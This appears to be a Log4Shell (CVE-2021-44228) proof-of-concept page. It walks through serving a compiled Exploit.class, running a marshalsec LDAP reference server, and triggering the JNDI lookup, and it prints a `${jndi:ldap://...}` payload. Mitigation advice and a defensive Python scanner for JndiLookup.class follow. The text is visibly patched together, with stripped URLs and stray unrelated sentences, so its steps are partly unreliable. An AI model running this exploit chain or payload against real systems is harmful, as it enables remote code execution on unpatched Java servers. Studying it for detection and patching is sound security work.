Log4j 1.x has other vulnerabilities; we recommend that you update to the latest version.
Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
Download this project, compile the exploit code (blob/master/src/main/java/), and start a web server that serves the compiled class.
git clone
cd CVE-2021-44228-Apache-Log4j-Rce
# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
# make sure the Python web server is running in the same directory as Exploit.class; to test:
curl -I
Download another project and run its LDAP server implementation, which returns JNDI references.
git clone
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""
Build and run the activation code (blob/master/src/main/java/), which simulates a Log4j attack on a vulnerable Java web server; the calculator app will appear.
cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j
# expect the following
# 1. the calculator app appears
# 2. in ldapserver console,
# Send LDAP reference result for Exploit redirecting to
# 3. in webserver console,
# - - [....] "GET /Exploit.class HTTP/1.1" 200 -
Do not rely on a current Java version to save you. Update Log4j (or remove the JNDI lookup). Disable the expansion (it seems a pretty bad idea anyway).
For example:
${jndi:ldap:// badClassName}
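Acting on the advice to update Log4j or remove the JNDI lookup starts with an inventory: which archives on a host still ship JndiLookup.class, and at what log4j-core version. The scanner below is an added example written for this page, not code from this project; it reads the version from the pom.properties that log4j-core jars carry, recurses into fat jars, wars and ears, and `make_sample_archive` only builds constructed stand-in archives for testing.

```python
import io, sys, zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PREFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

def read_version(zf):
    """log4j-core version from the jar's own pom.properties, or 'unknown'."""
    for entry in zf.namelist():
        if entry.startswith(POM_PREFIX) and entry.endswith("pom.properties"):
            for line in zf.read(entry).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    return "unknown"

def scan_archive(data, name):
    """Return [(path, version)] for every archive, nested ones included, that contains JndiLookup.class."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip at all: nothing to report
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP in names:
            findings.append((name, read_version(zf)))
        for entry in names:  # fat jars, wars and ears bundle log4j-core inside themselves
            if entry.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(entry), f"{name}!{entry}"))
    return findings

def scan_tree(root):
    """Walk a directory tree and scan every archive found in it."""
    archives = (p for p in Path(root).rglob("*") if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES)
    return [hit for p in archives for hit in scan_archive(p.read_bytes(), str(p))]

def make_sample_archive(entries):
    """Constructed in-memory zip from {entry_name: bytes or str}; test data, not a real log4j jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry, payload in entries.items():
            zf.writestr(entry, payload)
    return buf.getvalue()

if __name__ == "__main__":
    for path, version in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"JndiLookup.class present: {path} (log4j-core {version})")
```

Releases from 2.17.1 onward still ship JndiLookup.class with JNDI lookups disabled by default, so compare the reported version against the Apache advisory rather than treating presence alone as proof of exposure.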
Don't trust the web application firewall.
Lookups provide a way to add values to the Log4j configuration at arbitrary places.
The methods to cause leak in finally
If you want to do black-box testing, I suggest passive scanning.